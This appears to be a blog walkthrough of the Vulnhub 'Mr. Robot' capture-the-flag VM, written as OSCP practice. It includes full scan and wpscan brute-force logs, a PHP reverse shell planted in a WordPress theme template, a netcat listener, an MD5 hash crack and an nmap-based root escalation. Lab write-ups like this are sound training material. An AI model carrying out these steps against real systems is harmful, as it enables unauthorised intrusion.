Open in app

Sign in

Write

Sign in

OSCP Prep -Vulnhub Mr. Robot Walkthrough

assume-breach
12 min readSep 2, 2020

Mr. Robot is a CTF that I see everywhere so I thought I would do my own write-up to find out what all the hype is about.

I am using VirtualBox to run the VM and I’m not really sure if it works on VMWare. I’m using the new Kali 2020 image in 64 bit so we’ll see if there are any compatibility issues with exploits.

This is a great prelude to the OSCP if you are doing any prep. You’ll get some good enumeration practice and learn a little bit about a common privilege escalation technique. But enough about the VM, let’s get it going!

Enumeration

Okay let’s start out with an Nmap scan to see what’s going on. I’m not using any fancy switches here, just a normal scan.

user@kali:~/Desktop$ nmap -A -sV -Pn -p- 192.168.1.200
Starting Nmap 7.80 ( https://nmap.org ) at 2020–09–01 13:41 EDT
Nmap scan report for 192.168.1.200
Host is up (0.0097s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn’t have a title (text/html).
443/tcp open ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn’t have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015–09–16T10:45:03
|_Not valid after: 2025–09–13T10:45:03

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 141.59 seconds
user@kali:~/Desktop$

We have a few open ports:

Port 22 — SSH

Port 80 — HTTP Web Server

Port 443 — HTTPS Web Server

Let’s browse to the web server on port 80 and see if there’s anything on the homepage.

Cute.

Let’s fire up Dirb and see what we can find.

user@kali:~/Desktop$ dirb http://192.168.1.200

— — — — — — — — -
DIRB v2.22
By The Dark Raver
— — — — — — — — -

START_TIME: Tue Sep 1 13:52:27 2020
URL_BASE: http://192.168.1.200/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

— — — — — — — — -

GENERATED WORDS: 4612

— — Scanning URL: http://192.168.1.200/ — —
==> DIRECTORY: http://192.168.1.200/0/
==> DIRECTORY: http://192.168.1.200/admin/
+ http://192.168.1.200/atom (CODE:301|SIZE:0)
==> DIRECTORY: http://192.168.1.200/audio/
==> DIRECTORY: http://192.168.1.200/blog/
==> DIRECTORY: http://192.168.1.200/css/
+ http://192.168.1.200/dashboard (CODE:302|SIZE:0)
+ http://192.168.1.200/favicon.ico (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.1.200/feed/
==> DIRECTORY: http://192.168.1.200/image/
==> DIRECTORY: http://192.168.1.200/Image/
==> DIRECTORY: http://192.168.1.200/images/
+ http://192.168.1.200/index.html (CODE:200|SIZE:1188)
+ http://192.168.1.200/index.php (CODE:301|SIZE:0)
+ http://192.168.1.200/intro (CODE:200|SIZE:516314)
==> DIRECTORY: http://192.168.1.200/js/
+ http://192.168.1.200/license (CODE:200|SIZE:19930)
+ http://192.168.1.200/login (CODE:302|SIZE:0)
+ http://192.168.1.200/page1 (CODE:301|SIZE:0)
+ http://192.168.1.200/phpmyadmin (CODE:403|SIZE:94)
+ http://192.168.1.200/rdf (CODE:301|SIZE:0)
+ http://192.168.1.200/readme (CODE:200|SIZE:7334)
+ http://192.168.1.200/robots (CODE:200|SIZE:41)
+ http://192.168.1.200/robots.txt (CODE:200|SIZE:41)
+ http://192.168.1.200/rss (CODE:301|SIZE:0)
+ http://192.168.1.200/rss2 (CODE:301|SIZE:0)
+ http://192.168.1.200/sitemap (CODE:200|SIZE:0)
+ http://192.168.1.200/sitemap.xml (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.1.200/video/
==> DIRECTORY: http://192.168.1.200/wp-admin/
+ http://192.168.1.200/wp-config (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.1.200/wp-content/
+ http://192.168.1.200/wp-cron (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.1.200/wp-includes/
+ http://192.168.1.200/wp-links-opml (CODE:200|SIZE:228)
+ http://192.168.1.200/wp-load (CODE:200|SIZE:0)
+ http://192.168.1.200/wp-login (CODE:200|SIZE:2689)
+ http://192.168.1.200/wp-mail (CODE:403|SIZE:3018)
+ http://192.168.1.200/wp-settings (CODE:500|SIZE:0)
+ http://192.168.1.200/wp-signup (CODE:302|SIZE:0)
+ http://192.168.1.200/xmlrpc (CODE:405|SIZE:42)
+ http://192.168.1.200/xmlrpc.php (CODE:405|SIZE:42)

— — Entering directory: http://192.168.1.200/0/ — —
+ http://192.168.1.200/0/atom (CODE:301|SIZE:0)
==> DIRECTORY: http://192.168.1.200/0/feed/
+ http://192.168.1.200/0/index.php (CODE:301|SIZE:0)
+ http://192.168.1.200/0/rdf (CODE:301|SIZE:0)
+ http://192.168.1.200/0/rss (CODE:301|SIZE:0)
+ http://192.168.1.200/0/rss2 (CODE:301|SIZE:0)

From the output, we already see a few things that could pique our interest. The first is that the site is obviously running a WordPress blog of some sort. There are some silly things like the /intro page with a short video.

Just to make sure I didn’t miss anything, I decided to run a Nikto scan.

user@kali:~/Desktop$ nikto -h 192.168.1.200
- Nikto v2.1.6
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — -
+ Target IP: 192.168.1.200
+ Target Hostname: 192.168.1.200
+ Target Port: 80
+ Start Time: 2020–09–01 13:55:55 (GMT-4)
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — -
+ Server: Apache
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-powered-by header: PHP/5.5.29
+ No CGI Directories found (use ‘-C all’ to force check all possible dirs)
+ Uncommon header ‘tcn’ found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for ‘index’ were found: index.html, index.php
+ OSVDB-3092: /admin/: This might be interesting…
+ Uncommon header ‘link’ found, with contents: <http://192.168.1.200/?p=23>; rel=shortlink
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /admin/index.html: Admin login page/section found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login/: Admin login page/section found.
+ /wordpress: A Wordpress installation was found.
+ /wp-admin/wp-login.php: Wordpress login found
+ /wordpresswp-admin/wp-login.php: Wordpress login found
+ /blog/wp-login.php: Wordpress login found
+ /wp-login.php: Wordpress login found
+ /wordpresswp-login.php: Wordpress login found
+ 7915 requests: 0 error(s) and 18 item(s) reported on remote host
+ End Time: 2020–09–01 14:04:57 (GMT-4) (542 seconds)
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — -
+ 1 host(s) tested
user@kali:~/Desktop$

This confirmed that WordPress was definitely running. A lot of times, you want to manually view the robots.txt file. In this case, the VM is called Mr. Robot so I’m sure it’s worth taking a peak.

Looks like the page is pointing us to a dictionary file and another txt file! Let’s see if these are directories or downloads.

The fsocity.dic is a file. I’ll go ahead and save the file to my Kali box. Let’s check key-1-of-3.txt to see if this is a directory or a download.

Looks like our first flag! All right! Let’s see what’s in the fsocity.dic file.

Seems to be a wordlist! Since the blog is running against WordPress, we can use WPScan to try to get in. Let’s give it a shot!

The initial WPScan run did not yield any usernames. Since this is a WordPress blog, let’s see if we can use the trusty admin/admin password.

It doesn’t look like admin/admin is going to work, which is a bummer because this is always a favorite for these CTF’s. But if you notice on the output, it says that admin is not a valid username.

This is a themed CTF so maybe elliot will work. He is the main character of the show. Let’s give that a try.

Okay, elliot is definitely a user on here. WPScan has a brute force function that we can use. The fsocity.dic file has over 800k words on it so this might take a minute.

wpscan — url http://192.168.1.200/wp-login/ — usernames elliot — passwords /home/user/Downloads/fsocity.dic

After leaving the scanner overnight, we finally have a password. This took about 6 and half hours to complete.

user@kali:~/Desktop$ wpscan — url http://192.168.1.200/wp-login/ — usernames elliot — passwords /home/user/Downloads/fsocity.dic
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | ‘_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 3.8.4
Sponsored by Automattic — https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]N
[+] URL: http://192.168.1.200/wp-login/ [192.168.1.200]
[+] Started: Tue Sep 1 15:30:23 2020

Interesting Finding(s):

[+] Headers
| Interesting Entries:
| — Server: Apache
| — X-Powered-By: PHP/5.5.29
| — X-Mod-Pagespeed: 1.9.32.3–4523
| Found By: Headers (Passive Detection)
| Confidence: 100%

[+] http://192.168.1.200/wp-login/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] This site seems to be a multisite
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| Reference: http://codex.wordpress.org/Glossary#Multisite

[+] The external WP-Cron seems to be enabled: http://192.168.1.200/wp-login/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| — https://www.iplocation.net/defend-wordpress-from-ddos
| — https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.3.24 identified (Latest, released on 2020–06–10).
| Found By: Query Parameter In Install Page (Aggressive Detection)
| — http://192.168.1.200/wp-includes/css/buttons.min.css?ver=4.3.24
| — http://192.168.1.200/wp-includes/css/dashicons.min.css?ver=4.3.24
| Confirmed By: Query Parameter In Upgrade Page (Aggressive Detection)
| — http://192.168.1.200/wp-includes/css/buttons.min.css?ver=4.3.24
| — http://192.168.1.200/wp-includes/css/dashicons.min.css?ver=4.3.24

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups — Time: 00:00:00 <==================================> (21 / 21) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[+] Performing password attack on Wp Login against 1 user/s
Trying elliot / 6LdDSA4TAAAAANZDWjPdTiQcYsTuge5fMPQTd7D Time: 00:05:09 <> (12070 / 858160) 1.40% ETA: 06:01:2Trying elliot / Year2011201020092008200720062005200420032002200120001999199819971996199519941993199219911990198919881987198619851984198319821981198019791978197719761975197419731972197119701969196819671966196519641963196219611960195919581957195619551954195319521951195019491948194719461945194419431942194119401939193819371936193519341933193219311930192919281927192619251924192319221921192019191918191719161915191419131912191119101909190819071906Trying elliot / 6LdDSA4TAAAAANZDWjPdTiQcYsTuge5fMPQTd7D Time: 00:14:52 <> (34957 / 858160) 4.07% ETA: 05:50:2Trying elliot / 6LdDSA4TAAAAANZDWjPdTiQcYsTuge5fMPQTd7D Time: 00:24:39 <> (57840 / 858160) 6.74% ETA: 05:41:1Trying elliot / Year2011201020092008200720062005200420032002200120001999199819971996199519941993199219911990198919881987198619851984198319821981198019791978197719761975197419731972197119701969196819671966196519641963196219611960195919581957195619551954195319521951195019491948194719461945194419431942194119401939193819371936193519341933193219311930192919281927192619251924192319221921192019191918191719161915191419131912191119101909190819071906Trying elliot / 6LdDSA4TAAAAANZDWjPdTiQcYsTuge5fMPQTd7D Time: 00:34:32 <> (80725 / 858160) 9.40% ETA: 05:32:3Trying elliot / 6LdDSA4TAAAAANZDWjPdTiQcYsTuge5fMPQTd7D Time: 00:39:23 <> (92165 / 858160) 10.73% ETA: 05:27:2Trying elliot / Year2011201020092008200720062005200420032002200120001999199819971996199519941993199219911990198919881987198619851984198319821981198019791978197719761975197419731972197119701969196819671966196519641963196219611960195919581957195619551954195319521951195019491948194719461945194419431942194119401939193819371936193519341933193219311930192919281927192619251924192319221921192019191918191719161915191419131912191119101909190819071906Trying elliot / Year2011201020092008200720062005200420032002200120001999199819971996199519941993199219911990198919881987198619851984198319821981198019791978197719761975197419731972197119701969196819671966196519641963196219611960195919581957195619551954195319521951195019491948194719461945194419431942194119401939193819371936193519341933193219311930192919281927192619251924192319221921192019191918191719161915191419131912191119101909190819071906Trying elliot / 6LdDSA4TAAAAANZDWjPdTiQcYsTuge5fMPQTd7D Time: 01:18:28 <> (183700 / 858160) 21.40% ETA: 04:48:Trying elliot / Year2011201020092008200720062005200420032002200120001999199819971996199519941993199219911990198919881987198619851984198319821981198019791978197719761975197419731972197119701969196819671966196519641963196219611960195919581957195619551954195319521951195019491948194719461945194419431942194119401939193819371936193519341933193219311930192919281927192619251924192319221921192019191918191719161915191419131912191119101909190819071906Trying elliot / 6LdDSA4TAAAAANZDWjPdTiQcYsTuge5fMPQTd7D Time: 01:33:12 <> (218027 / 858160) 25.40% ETA: 04:33:Trying elliot / 6LdDSA4TAAAAANZDWjPdTiQcYsTuge5fMPQTd7D Time: 01:38:23 <> (229472 / 858160) 26.74% ETA: 04:29:Trying elliot / Year2011201020092008200720062005200420032002200120001999199819971996199519941993199219911990198919881987198619851984198319821981198019791978197719761975197419731972197119701969196819671966196519641963196219611960195919581957195619551954195319521951195019491948194719461945194419431942194119401939193819371936193519341933193219311930192919281927192619251924192319221921192019191918191719161915191419131912191119101909190819071906Trying elliot / 6LdDSA4TAAAAANZDWjPdTiQcYsTuge5fMPQTd7D Time: 01:48:31 <> (252357 / 858160) 29.40% ETA: 04:20:Trying elliot / 6LdDSA4TAAAAANZDWjPdTiQcYsTuge5fMPQTd7D Time: 01:53:39 <> (263797 / 858160) 30.73% ETA: 04:16:Trying elliot / Year2011201020092008200720062005200420032002200120001999199819971996199519941993199219911990198919881987198619851984198319821981198019791978197719761975197419731972197119701969196819671966196519641963196219611960195919581957195619551954195319521951195019491948194719461945194419431942194119401939193819371936193519341933193219311930192919281927192619251924192319221921192019191918191719161915191419131912191119101909190819071906Trying elliot / Year2011201020092008200720062005200420032002200120001999199819971996199519941993199219911990198919881987198619851984198319821981198019791978197719761975197419731972197119701969196819671966196519641963196219611960195919581957195619551954195319521951195019491948194719461945194419431942194119401939193819371936193519341933193219311930192919281927192619251924192319221921192019191918191719161915191419131912191119101909190819071906Trying elliot / Year2011201020092008200720062005200420032002200120001999199819971996199519941993199219911990198919881987198619851984198319821981198019791978197719761975197419731972197119701969196819671966196519641963196219611960195919581957195619551954195319521951195019491948194719461945194419431942194119401939193819371936193519341933193219311930192919281927192619251924192319221921192019191918191719161915191419131912191119101909190819071906Trying elliot / 6LdDSA4TAAAAANZDWjPdTiQcYsTuge5fMPQTd7D Time: 02:14:12 <> (309565 / 858160) 36.07% ETA: 03:57:Trying elliot / 6LdDSA4TAAAAANZDWjPdTiQcYsTuge5fMPQTd7D Time: 02:19:22 <> (321005 / 858160) 37.40% ETA: 03:53:Trying elliot / Year2011201020092008200720062005200420032002200120001999199819971996199519941993199219911990198919881987198619851984198319821981198019791978197719761975197419731972197119701969196819671966196519641963196219611960195919581957195619551954195319521951195019491948194719461945194419431942194119401939193819371936193519341933193219311930192919281927192619251924192319221921192019191918191719161915191419131912191119101909190819071906Trying elliot / 6LdDSA4TAAAAANZDWjPdTiQcYsTuge5fMPQTd7D Time: 02:40:06 <> (366778 / 858160) 42.74% ETA: 03:34:Trying elliot / Year2011201020092008200720062005200420032002200120001999199819971996199519941993199219911990198919881987198619851984198319821981198019791978197719761975197419731972197119701969196819671966196519641963196219611960195919581957195619551954195319521951195019491948194719461945194419431942194119401939193819371936193519341933193219311930192919281927192619251924192319221921192019191918191719161915191419131912191119101909190819071906Trying elliot / Year2011201020092008200720062005200420032002200120001999199819971996199519941993199219911990198919881987198619851984198319821981198019791978197719761975197419731972197119701969196819671966196519641963196219611960195919581957195619551954195319521951195019491948194719461945194419431942194119401939193819371936193519341933193219311930192919281927192619251924192319221921192019191918191719161915191419131912191119101909190819071906Trying elliot / 6LdDSA4TAAAAANZDWjPdTiQcYsTuge5fMPQTd7D Time: 02:55:44 <> (401101 / 858160) 46.73% ETA: 03:20:Trying elliot / Year2011201020092008200720062005200420032002200120001999199819971996199519941993199219911990198919881987198619851984198319821981198019791978197719761975197419731972197119701969196819671966196519641963196219611960195919581957195619551954195319521951195019491948194719461945194419431942194119401939193819371936193519341933193219311930192919281927192619251924192319221921192019191918191719161915191419131912191119101909190819071906Trying elliot / 6LdDSA4TAAAAANZDWjPdTiQcYsTuge5fMPQTd7D Time: 03:06:12 <> (423985 / 858160) 49.40% ETA: 03:10:Trying elliot / Year2011201020092008200720062005200420032002200120001999199819971996199519941993199219911990198919881987198619851984198319821981198019791978197719761975197419731972197119701969196819671966196519641963196219611960195919581957195619551954195319521951195019491948194719461945194419431942194119401939193819371936193519341933193219311930192919281927192619251924192319221921192019191918191719161915191419131912191119101909190819071906Trying elliot / 6LdDSA4TAAAAANZDWjPdTiQcYsTuge5fMPQTd7D Time: 03:11:25 <> (435427 / 858160) 50.73% ETA: 03:05:Trying elliot / Year2011201020092008200720062005200420032002200120001999199819971996199519941993199219911990198919881987198619851984198319821981198019791978197719761975197419731972197119701969196819671966196519641963196219611960195919581957195619551954195319521951195019491948194719461945194419431942194119401939193819371936193519341933193219311930192919281927192619251924192319221921192019191918191719161915191419131912191119101909190819071906Trying elliot / 6LdDSA4TAAAAANZDWjPdTiQcYsTuge5fMPQTd7D Time: 03:16:39 <> (446869 / 858160) 52.07% ETA: 03:01:Trying elliot / Year2011201020092008200720062005200420032002200120001999199819971996199519941993199219911990198919881987198619851984198319821981198019791978197719761975197419731972197119701969196819671966196519641963196219611960195919581957195619551954195319521951195019491948194719461945194419431942194119401939193819371936193519341933193219311930192919281927192619251924192319221921192019191918191719161915191419131912191119101909190819071906Trying elliot / 6LdDSA4TAAAAANZDWjPdTiQcYsTuge5fMPQTd7D Time: 03:27:08 <> (469753 / 858160) 54.73% ETA: 02:51:Trying elliot / 6LdDSA4TAAAAANZDWjPdTiQcYsTuge5fMPQTd7D Time: 03:32:21 <> (481195 / 858160) 56.07% ETA: 02:46:Trying elliot / Year2011201020092008200720062005200420032002200120001999199819971996199519941993199219911990198919881987198619851984198319821981198019791978197719761975197419731972197119701969196819671966196519641963196219611960195919581957195619551954195319521951195019491948194719461945194419431942194119401939193819371936193519341933193219311930192919281927192619251924192319221921192019191918191719161915191419131912191119101909190819071906Trying elliot / 6LdDSA4TAAAAANZDWjPdTiQcYsTuge5fMPQTd7D Time: 03:42:51 <> (504077 / 858160) 58.73% ETA: 02:36:Trying elliot / Year2011201020092008200720062005200420032002200120001999199819971996199519941993199219911990198919881987198619851984198319821981198019791978197719761975197419731972197119701969196819671966196519641963196219611960195919581957195619551954195319521951195019491948194719461945194419431942194119401939193819371936193519341933193219311930192919281927192619251924192319221921192019191918191719161915191419131912191119101909190819071906Trying elliot / 6LdDSA4TAAAAANZDWjPdTiQcYsTuge5fMPQTd7D Time: 03:48:04 <> (515522 / 858160) 60.07% ETA: 02:31:Trying elliot / 6LdDSA4TAAAAANZDWjPdTiQcYsTuge5fMPQTd7D Time: 03:53:17 <> (526962 / 858160) 61.40% ETA: 02:26:Trying elliot / 6LdDSA4TAAAAANZDWjPdTiQcYsTuge5fMPQTd7D Time: 03:58:31 <> (538407 / 858160) 62.73% ETA: 02:21:Trying elliot / Year2011201020092008200720062005200420032002200120001999199819971996199519941993199219911990198919881987198619851984198319821981198019791978197719761975197419731972197119701969196819671966196519641963196219611960195919581957195619551954195319521951195019491948194719461945194419431942194119401939193819371936193519341933193219311930192919281927192619251924192319221921192019191918191719161915191419131912191119101909190819071906Trying elliot / Year2011201020092008200720062005200420032002200120001999199819971996199519941993199219911990198919881987198619851984198319821981198019791978197719761975197419731972197119701969196819671966196519641963196219611960195919581957195619551954195319521951195019491948194719461945194419431942194119401939193819371936193519341933193219311930192919281927192619251924192319221921192019191918191719161915191419131912191119101909190819071906Trying elliot / 6LdDSA4TAAAAANZDWjPdTiQcYsTuge5fMPQTd7D Time: 04:08:57 <> (561287 / 858160) 65.40% ETA: 02:11:Trying elliot / 6LdDSA4TAAAAANZDWjPdTiQcYsTuge5fMPQTd7D Time: 04:14:12 <> (572731 / 858160) 66.73% ETA: 02:06:Trying elliot / 6LdDSA4TAAAAANZDWjPdTiQcYsTuge5fMPQTd7D Time: 04:19:27 <> (584172 / 858160) 68.07% ETA: 02:01:Trying elliot / Year2011201020092008200720062005200420032002200120001999199819971996199519941993199219911990198919881987198619851984198319821981198019791978197719761975197419731972197119701969196819671966196519641963196219611960195919581957195619551954195319521951195019491948194719461945194419431942194119401939193819371936193519341933193219311930192919281927192619251924192319221921192019191918191719161915191419131912191119101909190819071906Trying elliot / 6LdDSA4TAAAAANZDWjPdTiQcYsTuge5fMPQTd7D Time: 04:24:41 <> (595615 / 858160) 69.40% ETA: 01:56:Trying elliot / Year2011201020092008200720062005200420032002200120001999199819971996199519941993199219911990198919881987198619851984198319821981198019791978197719761975197419731972197119701969196819671966196519641963196219611960195919581957195619551954195319521951195019491948194719461945194419431942194119401939193819371936193519341933193219311930192919281927192619251924192319221921192019191918191719161915191419131912191119101909190819071906Trying elliot / 6LdDSA4TAAAAANZDWjPdTiQcYsTuge5fMPQTd7D Time: 04:50:50 <> (652825 / 858160) 76.07% ETA: 01:31:Trying elliot / 6LdDSA4TAAAAANZDWjPdTiQcYsTuge5fMPQTd7D Time: 05:33:39 <> (744360 / 858160) 86.73% ETA: 00:51:Trying elliot / Year2011201020092008200720062005200420032002200120001999199819971996199519941993199219911990198919881987198619851984198319821981198019791978197719761975197419731972197119701969196819671966196519641963196219611960195919581957195619551954195319521951195019491948194719461945194419431942194119401939193819371936193519341933193219311930192919281927192619251924192319221921192019191918191719161915191419131912191119101909190819071906Trying elliot / 6LdDSA4TAAAAANZDWjPdTiQcYsTuge5fMPQTd7D Time: 05:38:58 <> (755803 / 858160) 88.07% ETA: 00:45:Trying elliot / Year2011201020092008200720062005200420032002200120001999199819971996199519941993199219911990198919881987198619851984198319821981198019791978197719761975197419731972197119701969196819671966196519641963196219611960195919581957195619551954195319521951195019491948194719461945194419431942194119401939193819371936193519341933193219311930192919281927192619251924192319221921192019191918191719161915191419131912191119101909190819071906Trying elliot / 6LdDSA4TAAAAANZDWjPdTiQcYsTuge5fMPQTd7D Time: 05:49:40 <> (778685 / 858160) 90.73% ETA: 00:35:Trying elliot / Year2011201020092008200720062005200420032002200120001999199819971996199519941993199219911990198919881987198619851984198319821981198019791978197719761975197419731972197119701969196819671966196519641963196219611960195919581957195619551954195319521951195019491948194719461945194419431942194119401939193819371936193519341933193219311930192919281927192619251924192319221921192019191918191719161915191419131912191119101909190819071906Trying elliot / 6LdDSA4TAAAAANZDWjPdTiQcYsTuge5fMPQTd7D Time: 06:06:17 <> (813010 / 858160) 94.73% ETA: 00:20:Trying elliot / 6LdDSA4TAAAAANZDWjPdTiQcYsTuge5fMPQTd7D Time: 06:11:39 <> (824455 / 858160) 96.07% ETA: 00:15:Trying elliot / Year2011201020092008200720062005200420032002200120001999199819971996199519941993199219911990198919881987198619851984198319821981198019791978197719761975197419731972197119701969196819671966196519641963196219611960195919581957195619551954195319521951195019491948194719461945194419431942194119401939193819371936193519341933193219311930192919281927192619251924192319221921192019191918191719161915191419131912191119101909190819071906Trying elliot / 6LdDSA4TAAAAANZDWjPdTiQcYsTuge5fMPQTd7D Time: 06:17:04 <> (835896 / 858160) 97.40% ETA: 00:10:Trying elliot / Year2011201020092008200720062005200420032002200120001999199819971996199519941993199219911990198919881987198619851984198319821981198019791978197719761975197419731972197119701969196819671966196519641963196219611960195919581957195619551954195319521951195019491948194719461945194419431942194119401939193819371936193519341933193219311930192919281927192619251924192319221921192019191918191719161915191419131912191119101909190819071906[SUCCESS] — elliot / ER28–0652
Trying elliot / uHack Time: 06:27:27 <=============== > (858155 / 1716315) 49.99% ETA: ??:??:??

[!] Valid Combinations Found:
| Username: elliot, Password: ER28–0652

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up

[+] Finished: Tue Sep 1 21:57:55 2020
[+] Requests Done: 858178
[+] Cached Requests: 67
[+] Data Sent: 273.714 MB
[+] Data Received: 3.358 GB
[+] Memory used: 215.199 MB
[+] Elapsed time: 06:27:32

So, after all of that, we finally have our password: ER28–0652

Let’s try to upload a php-reverse-shell from our Kali box. You can find the reverse shell at /usr/share/webshells/php/. I like putting my reverse shell in the 404.php directory. You can get there by going to Themes under Appearance and then clicking Editor. Once there, the 404.php template can be accessed from the menu on the right side of the screen.

Paste in your reverse shell and change the default IP and port to that of your Kali box.

Let’s set up a NetCat listener on the port we defined in our reverse shell. For me, it was port 4444.

Now, in a separate browser window, go to the 404.php template. Mine was located here:

http://192.168.1.200/wp-content/themes/twentyfifteen/404.php

And we have our reverse shell!

Doing a quick whoami, I see that we are daemon. Let’s browse around a little to see what we can do! Wait, wait, wait. Before anything, let’s upgrade our shell to a TTY.

python -c ‘import pty; pty.spawn(“/bin/sh”)’

Browsing to the /home folder, we see that there is a home folder for robot. Doing a quick ls reveals two files.

Let’s see what key-2-of-3.txt is. Probably a flag.

Oh! Permission denied! Bummer. But, password.raw.md5 is readable so let’s check that out.

Sweet! We have an MD5 hash. Let’s try to crack it. We can copy the hash and then head over to CrackStation to decrypt the password.

Awesome! Our password is abcdefghijklmnopqrstuvwxyz. And just like that, we can su to robot:

Let’s grab that flag!

Great! Now let’s see what kind of permissions we have here. I like to use linpeas.sh for easy wins. It’s colorful so it helps easily recognize a kernel exploit or something simple.

If you don’t have linpeas.sh, you can get it below:

https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/linpeas.sh

I set up a python server in the directory holding my linpeas.sh script.

On the target, I find a writable folder. This is usually /tmp. I also make sure that wget is installed.

I copy over my script and make it executable.

Privilege Escalation

After running the script, we see that linpeas.sh has highlighted the kernel.

I did a little research, but ultimately, this wasn’t the way to root. Scrolling down the script, we see that nmap is highlighted.

There is a known privilege escalation trick with nmap. We can run it in interactive mode.

And we have root! Let’s get the final flag.

This was a really fun box. The only real hiccup was the password brute forcing in the WordPress blog, but sometimes it’s like that.

I hope you enjoyed this write-up! If so, get in touch on Twitter @assume_breach or give me a follow here on Medium!

Oscp
Cybersecurity
Hacking
Ethical Hacking
Vulnhub

--

--

assume-breach

Written by assume-breach

4.6K Followers

Security enthusiast that loves a good CTF! OSCP, CRTO, RHCSA, MCSA.

Help

Status

About

Careers

Blog

Privacy

Terms

Text to speech

Teams